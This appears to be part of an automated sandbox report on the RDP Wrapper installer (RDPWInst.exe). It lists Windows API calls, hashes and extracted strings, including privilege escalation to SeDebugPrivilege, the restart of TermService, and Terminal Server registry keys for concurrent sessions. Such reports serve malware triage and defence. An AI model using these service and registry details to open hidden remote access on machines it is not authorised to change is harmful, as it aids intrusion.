                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                                                                              • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                                                                              • API String ID: 1401577899-1200187420
                                                                                                              • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                              • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                                                                              • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                              • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                                                                              • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoadResource$FindFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 3272429154-0
                                                                                                              • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                              • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                                                                              • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                              • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                                                                              APIs
                                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                                                                                • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                                • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 3216391948-0
                                                                                                              • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                              • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                                                                              • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                              • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                              • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 31276548-0

                                                                                                              Strings
                                                                                                              • -l display the license agreement, xrefs: 004438B7
                                                                                                              • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                                                                              • license, xrefs: 00443989
                                                                                                              • [+] Done., xrefs: 00443F83
                                                                                                              • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                                                                              • [-] Unsupported processor architecture., xrefs: 004439F8
                                                                                                              • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                                                                              • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                                                                              • -r force restart Terminal Services, xrefs: 00443951
                                                                                                              • [-] Unsupported Windows version:, xrefs: 004439BE
                                                                                                              • [*] Checking dependencies..., xrefs: 00443BC8
                                                                                                              • [*] Extracting files..., xrefs: 00443B4F
                                                                                                              • [*] Checking for updates..., xrefs: 00443EB2
                                                                                                              • USAGE:, xrefs: 00443878
                                                                                                              • [*] Installing..., xrefs: 00443AE5
                                                                                                              • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                                                                              • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                                                                              • [*] Notice to user:, xrefs: 00443A61
                                                                                                              • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                                                                              • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                                                                              • [*] Uninstalling..., xrefs: 00443D0F
                                                                                                              • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                                                                              • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                                                                              • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                                                                              • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                                                                              • do not use the software., xrefs: 00443ACF
                                                                                                              • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                                                                              • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                                                                              • [*] Configuring service library..., xrefs: 00443BAD
                                                                                                              • -w get latest update for INI file, xrefs: 0044390F
                                                                                                              • [+] Successfully uninstalled., xrefs: 00443E57
                                                                                                              • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                                                                              • [*] Restarting..., xrefs: 00443EED
                                                                                                              • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                                                                              • $sD, xrefs: 00443761
                                                                                                              • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                                                                              • Installer v2.5, xrefs: 0044378D
                                                                                                              • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                                                                              • [+] Successfully installed., xrefs: 00443CA2
                                                                                                              • [*] Resetting service library..., xrefs: 00443D38
                                                                                                              • -u uninstall wrapper, xrefs: 00443925
                                                                                                              • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                                                                              • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                                                                              • [*] Removing files..., xrefs: 00443D87
                                                                                                              • LpD, xrefs: 0044374F
                                                                                                              • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                                                                              • API String ID: 0-551293883

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                                                                              • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                                                                              • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                                                                              • API String ID: 1452528299-1114397459

                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                                                                              • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                              • API String ID: 3482678030-345420546
                                                                                                              • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                              • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                                                                              • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                              • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                                                                              • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                                                                                • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                                • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CloseFlush
                                                                                                              • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                                                                              • API String ID: 1149308822-2563127478
                                                                                                              • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                              • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                                                                              • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                              • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                                                                              • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                                                                              • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                                                                              • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                                                                              • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                                                                              • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                                                                              • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                                                                              • String ID: en-GB,en,en-US,
                                                                                                              • API String ID: 1058953229-3021119265
                                                                                                              • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                              • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                                                                              • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                              • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                              • GetLastError.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                                                                              • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                                                                              • API String ID: 1809907545-775158141
                                                                                                              • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                              • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                                                                              • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                              • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                                                                              • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                              • String ID:
                                                                                                              • API String ID: 1694776339-0
                                                                                                              • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                              • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                                                                              • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                              • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
